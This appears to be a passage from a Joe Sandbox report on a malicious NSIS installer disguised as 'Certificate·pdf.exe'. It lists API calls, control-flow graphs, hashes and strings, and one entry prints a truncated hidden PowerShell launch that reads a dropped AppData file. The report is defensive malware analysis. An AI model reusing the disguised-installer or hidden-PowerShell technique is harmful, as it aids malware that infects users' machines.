          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: DirectoryLibraryLoadSystemwsprintf
          • String ID: %s%S.dll$UXTHEME$\
          • API String ID: 2200240437-1946221925
          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
          • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
          • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 584 403116-40312d 585 403136-40313f 584->585 586 40312f 584->586 587 403141 585->587 588 403148-40314d 585->588 586->585 587->588 589 40315d-40316a call 40330e 588->589 590 40314f-403158 call 403324 588->590 594 403170-403174 589->594 595 4032fc 589->595 590->589 596 4032a7-4032a9 594->596 597 40317a-4031a0 GetTickCount 594->597 598 4032fe-4032ff 595->598 602 4032e9-4032ec 596->602 603 4032ab-4032ae 596->603 599 403304 597->599 600 4031a6-4031ae 597->600 601 403307-40330b 598->601 599->601 604 4031b0 600->604 605 4031b3-4031c1 call 40330e 600->605 606 4032f1-4032fa call 40330e 602->606 607 4032ee 602->607 603->599 608 4032b0 603->608 604->605 605->595 617 4031c7-4031d0 605->617 606->595 618 403301 606->618 607->606 611 4032b3-4032b9 608->611 612 4032bb 611->612 613 4032bd-4032cb call 40330e 611->613 612->613 613->595 621 4032cd-4032d9 call 405e3f 613->621 620 4031d6-4031f6 call 4067d2 617->620 618->599 626 4031fc-40320f GetTickCount 620->626 627 40329f-4032a1 620->627 628 4032a3-4032a5 621->628 629 4032db-4032e5 621->629 630 403211-403219 626->630 631 40325a-40325c 626->631 627->598 628->598 629->611 634 4032e7 629->634 635 403221-403252 MulDiv wsprintfW call 4052ff 630->635 636 40321b-40321f 630->636 632 403293-403297 631->632 633 40325e-403262 631->633 632->600 639 40329d 632->639 637 403264-40326b call 405e3f 633->637 638 403279-403284 633->638 634->599 643 403257 635->643 636->631 636->635 644 403270-403272 637->644 642 403287-40328b 638->642 639->599 642->620 645 403291 642->645 643->631 644->628 646 403274-403277 644->646 645->599 646->642
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CountTick$wsprintf
          • String ID: ... %d%%
          • API String ID: 551687249-2449383134
          • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
          • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
          • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
          • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 647 405dbc-405dc8 648 405dc9-405dfd GetTickCount GetTempFileNameW 647->648 649 405e0c-405e0e 648->649 650 405dff-405e01 648->650 652 405e06-405e09 649->652 650->648 651 405e03 650->651 651->652
          APIs
          • GetTickCount.KERNEL32 ref: 00405DDA
          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6), ref: 00405DF5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CountFileNameTempTick
          • String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
          • API String ID: 1716503409-3647523685
          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
          • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
          • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 653 4015c1-4015d5 call 402c41 call 405c17 658 401631-401634 653->658 659 4015d7-4015ea call 405b99 653->659 661 401663-402250 call 401423 658->661 662 401636-401655 call 401423 call 406297 SetCurrentDirectoryW 658->662 667 401604-401607 call 40584b 659->667 668 4015ec-4015ef 659->668 676 402ac5-402ad4 661->676 677 40288b-402892 661->677 662->676 680 40165b-40165e 662->680 678 40160c-40160e 667->678 668->667 673 4015f1-4015f8 call 405868 668->673 673->667 684 4015fa-401602 call 4057ce 673->684 677->676 681 401610-401615 678->681 682 401627-40162f 678->682 680->676 685 401624 681->685 686 401617-401622 GetFileAttributesW 681->686 682->658 682->659 684->678 685->682 686->682 686->685
          APIs
            • Part of subcall function 00405C17: CharNextW.USER32(?,?,007A4728,?,00405C8B,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405C25
            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
            • Part of subcall function 004057CE: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens,?,00000000,000000F0), ref: 0040164D
          Strings
          • C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens, xrefs: 00401640
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CharNext$Directory$AttributesCreateCurrentFile
          • String ID: C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens
          • API String ID: 1892508949-2063836133
          • Opcode ID: 73940142f68607cba11c891c41a5eadd7aa80569be3db2e043df1f50633e24e8
          • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
          • Opcode Fuzzy Hash: 73940142f68607cba11c891c41a5eadd7aa80569be3db2e043df1f50633e24e8
          • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 690 405c74-405c8f call 406297 call 405c17 695 405c91-405c93 690->695 696 405c95-405ca2 call 40652b 690->696 697 405ced-405cef 695->697 700 405cb2-405cb6 696->700 701 405ca4-405caa 696->701 703 405ccc-405cd5 lstrlenW 700->703 701->695 702 405cac-405cb0 701->702 702->695 702->700 704 405cd7-405ceb call 405b6c GetFileAttributesW 703->704 705 405cb8-405cbf call 4065da 703->705 704->697 710 405cc1-405cc4 705->710 711 405cc6-405cc7 call 405bb8 705->711 710->695 710->711 711->703
          APIs
            • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
            • Part of subcall function 00405C17: CharNextW.USER32(?,?,007A4728,?,00405C8B,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405C25
            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
          • lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405CCD
          • GetFileAttributesW.KERNELBASE(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420), ref: 00405CDD
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CharNext$AttributesFilelstrcpynlstrlen
          • String ID: (Gz
          • API String ID: 3248276644-3338112938
          • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
          • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
          • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
          • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 713 406165-406197 call 406104 716 4061d5 713->716 717 406199-4061c7 RegQueryValueExW RegCloseKey 713->717 719 4061d9-4061db 716->719 717->716 718 4061c9-4061cd 717->718 718->719 720 4061cf-4061d3 718->720 720->716 720->719
          APIs
          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Execute: ,?,?,004063D9,80000002), ref: 004061AB
          • RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Execute: ,Execute: ,Execute: ,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 004061B6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CloseQueryValue
          • String ID: Execute:
          • API String ID: 3356406503-3756222843
          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
          • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
          • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 721 405880-4058b1 CreateProcessW 722 4058b3-4058bc CloseHandle 721->722 723 4058bf-4058c0 721->723 722->723
          APIs
          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
          • CloseHandle.KERNEL32(?), ref: 004058B6
          Strings
          • Error launching installer, xrefs: 00405893
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CloseCreateHandleProcess
          • String ID: Error launching installer
          • API String ID: 3712363035-66219284
          • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
          • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
          • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
          • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
          APIs
          • lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
          • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
          • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CloseValuelstrlen
          • String ID:
          • API String ID: 2655323295-0
          • Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
          • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
          • Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
          • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
          APIs
            • Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,007A4728,00405CBD,007A4728,007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420), ref: 004065E5
            • Part of subcall function 004065DA: FindClose.KERNEL32(00000000), ref: 004065F1
          • lstrlenW.KERNEL32 ref: 00402299
          • lstrlenW.KERNEL32(00000000), ref: 004022A4
          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: FileFindlstrlen$CloseFirstOperation
          • String ID:
          • API String ID: 1486964399-0
          • Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
          • Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
          • Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
          • Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59
          APIs
          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
          • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
